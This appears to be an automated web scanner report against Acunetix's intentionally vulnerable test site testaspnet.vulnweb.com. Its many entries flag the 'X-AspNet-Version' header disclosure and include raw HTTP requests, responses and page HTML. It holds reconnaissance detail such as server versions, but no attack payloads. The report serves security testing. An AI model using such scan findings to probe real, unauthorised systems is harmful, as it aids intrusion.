cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. 
Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" 
style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/rssFeed.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/rssFeed.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response Status line and header section (220 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 2118
Response body (2118 bytes)
<rss version="2.0"> <channel> <title>Acunetix testaspnet</title> <link>http://testaspnet.acunetix.com/</link> <description> This is the syndication feed for testaspnet.acunetix.com. </description> <item> <title>Acunetix Vulnerability Scanner Now With Network Security Scans</title> <description> Seamless OpenVAS integration now also available on Windows and Linux </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=0 </link> <author>admin </author> <pubDate> Thu, 16 May 2019 12:32:30 GMT </pubDate> </item> <item> <title>Acunetix Web Vulnerability Scanner beta released!</title> <description> 26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=3 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:37:35 GMT </pubDate> </item> <item> <title>Web attacks - can your web applications withstand the force?</title> <description> 21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed. </description> <link> http://testaspnet.acunetix.com/ReadNews.aspx?id=2 </link> <author>admin </author> <pubDate> Tue, 08 Nov 2005 11:35:22 GMT </pubDate> </item> </channel> </rss>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Signup.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (315 bytes)
GET http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 12954
Response body (12954 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/about.aspx
Content-Length: 1027
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1027 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 14467
Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability 
Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. 
Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. 
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
Content-Length: 1415
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1415 bytes)
Response Status line and header section (178 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Response body (0 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Content-Length: 1721
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1721 bytes)
Response Status line and header section (178 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Response body (0 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/Comments.aspx?id=3
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
Content-Length: 1539
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1539 bytes)
Response Status line and header section (178 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Response body (0 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/default.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (388 bytes)
POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com
Content-Length: 1025
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1025 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 12371
Response body (12371 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/login.aspx
Content-Length: 1197
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (1197 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:19 GMT
Content-Length: 13281
Response body (13281 bytes)
href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. 
It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Content-Length: 6543
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (6543 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 22723
Response body (22723 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (414 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Content-Length: 10975
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (10975 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 30429
Response body (30429 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request
Request line and header section (413 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Content-Length: 3745
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (3745 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:21 GMT
Content-Length: 17859
Response body (17859 bytes)
Evidence 2.0.50727
Solution Configure the server so it will not return those headers.
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0
Alert tags
Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (455 bytes)
POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Content-Length: 6567
